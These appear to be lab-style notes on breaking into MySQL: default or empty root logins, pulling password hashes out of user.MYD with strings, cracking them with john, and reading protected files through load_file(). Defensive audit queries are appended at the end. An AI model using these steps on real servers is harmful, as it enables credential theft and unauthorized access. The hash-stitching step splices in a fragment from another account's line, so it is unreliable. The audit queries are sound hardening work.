MySQL

Easy to Try

  • Sometimes people leave NO password, or one that is easy to guess.

su mysql        .. mysql is sometimes an actual system user
mysql -u root   .. see if you can get into mysql easily
                .. easy guess: 'mysql' as the password!!
show databases;
use [DATABASE];
show tables;
select * from [TABLE];

Strings MYD

> strings /var/lib/mysql/mysql/user.MYD   .. might get you a password hash

localhost
root*D3240DFEFEDF838952C03D28
6c732c6044b7
root 127.0.0.1
root localhost
debian-sys-maint*D1461CE757B9B67AC344204A3A7FE9F9DB17A35C
68B0F4D12A2A1885

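..
The hash comes out split across lines. Stitch the two fragments together (D3240DFEFEDF838952C03D28 and 68B0F4D12A2A1885) to get the full 40-hex-character hash: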
root:*D3240DFEFEDF838952C03D2868B0F4D12A2A1885

john ./lab.txt
root18  ..cracked!

PrivEsc

Privesc to read a file you shouldn't have access to!
Some of this is locked down in later releases of MySQL, but worth checking!!

>> mysql -u root
>> select load_file('/var/lib/mysql-files/key.txt');
+-------------------------------------------+
| load_file('/var/lib/mysql-files/key.txt') |
+-------------------------------------------+
| 4234db90-01c6-4f10-8c81-8c0017107fc7
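
A defender-side audit for the weaknesses covered in these notes (empty passwords, SHA-1 based hashes readable from user.MYD, file reads through load_file). This is an added example, not part of the original notes; it assumes MySQL 5.7 or later column names (authentication_string, account_locked), while older releases keep the hash in mysql.user.Password.

```sql
-- Added example: audit queries to run as an administrative account.
-- Assumption: MySQL 5.7+ layout of mysql.user.

-- 1. Password-based accounts that can log in with no password at all.
--    Socket/PAM style plugins legitimately have an empty string, so only
--    the password plugins are checked.
SELECT user, host, plugin
FROM mysql.user
WHERE (authentication_string IS NULL OR authentication_string = '')
  AND plugin IN ('mysql_native_password',
                 'caching_sha2_password',
                 'sha256_password')
  AND account_locked = 'N';

-- 2. Accounts still stored as mysql_native_password hashes:
--    '*' followed by 40 hex characters, i.e. unsalted SHA1(SHA1(password)).
--    This is the format that shows up in the strings output above.
SELECT user, host
FROM mysql.user
WHERE plugin = 'mysql_native_password'
  AND authentication_string LIKE '*%'
  AND CHAR_LENGTH(authentication_string) = 41;

-- 3. Accounts holding the global FILE privilege, which LOAD_FILE() requires.
SELECT user, host
FROM mysql.user
WHERE File_priv = 'Y';

-- 4. Where the server permits file import/export operations:
--    ''    = no directory restriction
--    path  = LOAD_FILE / LOAD DATA / INTO OUTFILE limited to that directory
--    NULL  = file import/export disabled
SELECT @@GLOBAL.secure_file_priv AS secure_file_priv;
```

Any rows from queries 1 to 3 are candidates for a password reset, a move off mysql_native_password, or `REVOKE FILE ON *.* FROM ...`. secure_file_priv is read-only at runtime and has to be set in the server configuration file.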
